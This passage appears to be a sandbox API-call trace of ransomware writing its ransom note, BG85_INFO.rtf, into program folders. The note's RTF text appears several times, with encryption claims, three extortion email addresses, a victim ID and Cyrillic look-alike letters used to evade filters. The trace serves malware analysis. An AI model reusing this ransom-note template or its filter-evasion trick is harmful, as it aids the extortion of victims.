tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0070.819] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e971a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e971a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0070.820] CloseHandle (hObject=0x1bc) returned 1 [0070.820] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cat\\bg85_info.rtf")) returned 0xffffffff [0070.820] GetLastError () returned 0x2 [0070.820] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cat\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0070.821] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0070.821] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0070.821] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u 